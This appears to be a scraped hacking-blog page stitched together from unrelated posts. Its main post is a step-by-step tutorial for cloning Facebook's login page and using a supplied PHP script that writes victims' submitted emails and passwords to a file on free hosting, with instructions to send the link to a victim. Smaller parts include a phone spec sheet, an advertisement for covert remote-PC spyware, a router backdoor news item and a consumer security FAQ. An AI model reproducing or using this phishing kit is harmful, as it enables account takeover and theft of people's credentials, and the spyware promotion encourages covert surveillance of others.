HACKERS

Hack Facebook account through Phising

What is phishing?


Phishing is attempting to acquire information (and sometimes, indirectly, money) such as usernames, passwords, and credit card details by masquerading as a trustworthy entity in an electronic communication. Communications purporting to be from popular social web sites, auction sites, online payment processors or IT administrators are commonly used to lure the unsuspecting public. Phishing is typically carried out by e-mail spoofing or instant messaging,and it often directs users to enter details at a fake website whose look and feel are almost identical to the legitimate one. Phishing is an example of social engineering techniques used to deceive users, and exploits the poor usability of current web security technologies. Attempts to deal with the growing number of reported phishing incidents includelegislation, user training, public awareness, and technical security measures.


Facebook Phishing:

In Facebook Phishing we create our own page which is like Facebook page for that purpose we copy the source code of Facebook.com and make some amendment in it when the victim try to sin in he redirected on the webpage of our choice and it's email and password is sent to the hosting site and in this way we get it's account!

Facebook Hacking through Phishing:
Just Follow the following steps to make your own Facebook Phishing Page.
1.Go to the Facebook page ,and then right click on the page, u will see the option view source page,click on that.




Facebook Hacking
                                          
2.now a new tab will open which contain a source code,Select all the stuff and paste it in a notepad.
3.Now open the notepad and press CTRL+F,and type ACTION.


facebook phishing script
                                                  

                                           
4.You will have to find a text which looks like ..

                                       action="https://www.facebook.com/login.php?login_attempt=1"

5.delete all the text written in red colour and instead of it write post.php.then it will look like...

                                                 action="post.php"

6.Now save it on your desktop with the name index.htm,not index.html,remember.

7.Now your phishing page is ready.it will look like a pic given below .


hacking script
index

                                                   
8.Open a new notepad and save the given data with the name post.php.

<?php
header ('Location:http://www.facebook.com/');
$handle = fopen("usernames.txt", "a");
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?> 

9.You have two files now one is index.htm and another is post.php,remember file extension is important.

10.Now u have to upload it in a web hosting site ,i prefer u to use www.000webhost.com.

11.I prefer u to use 000webhost because it will be easy to use.
                           
hosting website
                                              

12.You have to make a account in that ,after that it looks like a picture given below.



facebook script hosting website
                                                                          
13.Now go control pannel,then on file manager.

14.After that a new window will pop up.Now go to public_html.


                                           
                                        

15.Delete the file named default.php,after that upload two files index.htm and post.php one by        one .



                                        
16.Now the last step click on view of index.htm it will look same as facebook page.



this is your Facebook phishing page
                                         

17.Copy the url of that page and send this link to your victim,when your victim try to login in to it with the username and password .the page redirectly connect to facebook. and you will be now able to see his password.

18.Open your 000webhost account and go to file manager then public_html,here you find a new file named username.txt.
                                


                                        

19.Click on view now u will have your friend's password and email id.


                                           

20.This is a simple trick to hack any Facebook password account by phishing page.


I hope you will understand this!

You can also create phishing page of Yahoo.com, Twitter.com, Gmail.com, Orkut.com, Blogger.com, Hotmail.com etc. and can easily hack accounts!

Nokia Asha 300 Full specifications and Price


Nokia Asha 300 - Fun & Fast.
Get the speed that you need with Nokia Asha 300 when you want to go online, Make the home screen yours on Nokia Asha 300 with everything you want just a touch away, The Nokia Asha 300 makes staying in touch really easy. Update your Facebook status or send a tweet, Use the 5 MP camera of Nokia Asha 300 to snap all the nice things and the surprising things you find in your daily life.  

 Dimension
112.8 x 49.5 x 12.7 mm, 59 cc  






 Weight 
85 g  

 Battery 
Talk time Up to 6 h 54 min, Stand-by Up to 550 h, Music play Up to 28 h  

 Memory 
140 MB built-in, 128 MB RAM, 256 MB ROM + microSD card (supports up to 32GB) 

 Processor 
1 GHz 

 Connectivity 
Bluetooth v2.1 with A2DP, EDR, USB, GPRS, EDGE, 3G (HSDPA 10.2 Mbps, HSUPA 2 Mbps)  

 Display Size 
240 x 320 pixels, 2.4 inches, Proximity sensor  

 Display Colour 
TFT resistive touchscreen, 256K colors  

 Operating
 Frequency / Band 

GSM 850 / 900 / 1800 / 1900 HSDPA 850 / 900 / 1900 / 2100  

 Browser
WAP 2.0/xHTML, HTML  

 Colors
Graphite, Night Shade, Gold, White Silver, Pink, Red  

 Entertainment 
Stereo FM radio with RDS, 3.5mm audio jack, MP4/H.264/H.263/WMV player, MP3/WAV/WMA/AAC player, SNS integration, Games (built-in + downloadable)  

 Camera 
5 MP, 2592x1944 pixels, fixed focus, Video (VGA 30fps)  

 Other Features 
Flash Lite support, Voice memo, Predictive text input, Speakerphone  

 Ring Tones 
Polyphonic, WAV, MP3  

 Messaging 
SMS(threaded view), MMS, Email, Push Email, IM  

 Price 
Price in Rs: 9,200    Price in USD: $107

Sniper Spy Remote Software for hacking

Sniper spy is the industry leading Remote password hacking softwarecombined with the Remote Install and Remote Viewing feature.
Once installed on the remote PC(s) you wish, you only need to login to your own personal SniperSpy account to view activity logs of the remote PC’s!  This means that you can view logs of the remote PC’s from anywhere in the world as long as you have internet access!
Do you want to Spy on a Remote PC? Expose the truth behind the lies! Unlike the rest, SniperSpy allows you to remotely spy any PC like a television! Watch what happens on the screen LIVE! The only remote PC spy software with a SECURE control panel!
This Remote PC Spy software also saves screenshots along with text logs of chats, websites, keystrokes in any language and more. Remotely view everything your child, employee or anyone does while they use your distant PC. Includes LIVE admin and control commands!

Read More. . .

Backdoor in Linksys and Netgear routers - Hacking

router

This news could hurt the reputation of both companies. A passionate (and obviously very competent) reverse-engineer from France, Eloi Vanderbeken forgot the admin interface password of his router and so he just wanted to have fun accessing the administration side and that’s when he discovered a backdoor in his Linksys WAG200G router. After publishing this discovery on Github, other users have confirmed its existence in at least three other routers:
  • Netgear DM111Pv2
  • Linksys WAG320N
  • Linksys WAG54G2
Other routers are suspected of providing equal opportunity to obtain the administrator password through the 32764 port, but it has not yet been confirmed:
  • Netgear DG934
  • Netgear DG834
  • Netgear WPNT834
  • Netgear DG834G
  • Netgear WG602
  • Netgear WGR614
  • Netgear DGN2000
  • Linksys WAG120N
  • Linksys WAG160N
  • Linksys WRVS4400N

    Read more. . .

Hacking in Computer and Predators

How are computer hackers and predators a threat to computer security?

People, not computers, create computer threats. Computer predators victimize others for their own gain. Give a predator access to the Internet — and to your PC — and the threat they pose to your security increases exponentially. Computer hackers are unauthorized users who break into computer systems in order to steal, change or destroy information, often by installing dangerous malware without your knowledge or consent. Their clever tactics and detailed technical knowledge help them access information you really don’t want them to have.

How do computer hackers and predators find me?

Anyone who uses a computer connected to the Internet is susceptible to the threats that computer hackers and predators pose. These online villains typically use phishing scams, spam email or instant messages and bogus Web sites to deliver dangerous malware to your computer and compromise your computer security. Computer hackers can also try to access your computer and private information directly if you are not protected with a firewall. They may also monitor your chat room conversations or peruse your personal Web page. Usually disguised with a bogus identity, predators can lure you into revealing sensitive personal and financial information, or much worse.

What can computer hackers and predators do to me?

While your computer is connected to the Internet, the malware a hacker has installed on your PC quietly transmits your personal and financial information without your knowledge or consent. Or, a computer predator may pounce on the private information you unwittingly revealed. In either case, they may:
  • Hijack your usernames and passwords
  • Steal your money and open credit card and bank accounts in your name
  • Ruin your credit
  • Request new account Personal Identification Numbers (PINs) or additional credit cards
  • Make purchases
  • Add themselves or an alias that they control as an authorized user so it’s easier to use your credit
  • Obtain cash advances
  • Use and abuse your Social Security number
  • Sell your information to other parties who will use it for illicit or illegal purposes
Predators can pose a serious physical threat. Use extreme caution when agreeing to meet an online “friend” or acquaintance in person.

How will I know?

Check the accuracy of your personal accounts, credit cards and documents. Are there unexplained transactions? Questionable or unauthorized changes? If so, dangerous malware installed by predators or hackers may already be lurking.

What can I do about computer hackers and predators?

When you arm yourself with information and resources, you’re wiser about computer security threats and less vulnerable to threat tactics. Hackers and predators pose equally serious and but very different threats.

To protect your computer from hackers and predators:

  • Continually check the accuracy of personal accounts and deal with any discrepancies right away
  • Use extreme caution when entering chat rooms or posting personal Web pages
  • Limit the personal information you post on a personal Web pages
  • Carefully monitor requests by online “friends” or acquaintances for predatory behavior
  • Keep personal and financial information out of online conversations
  • Use extreme caution when agreeing to meet an online “friend” or acquaintance in person

Back to Top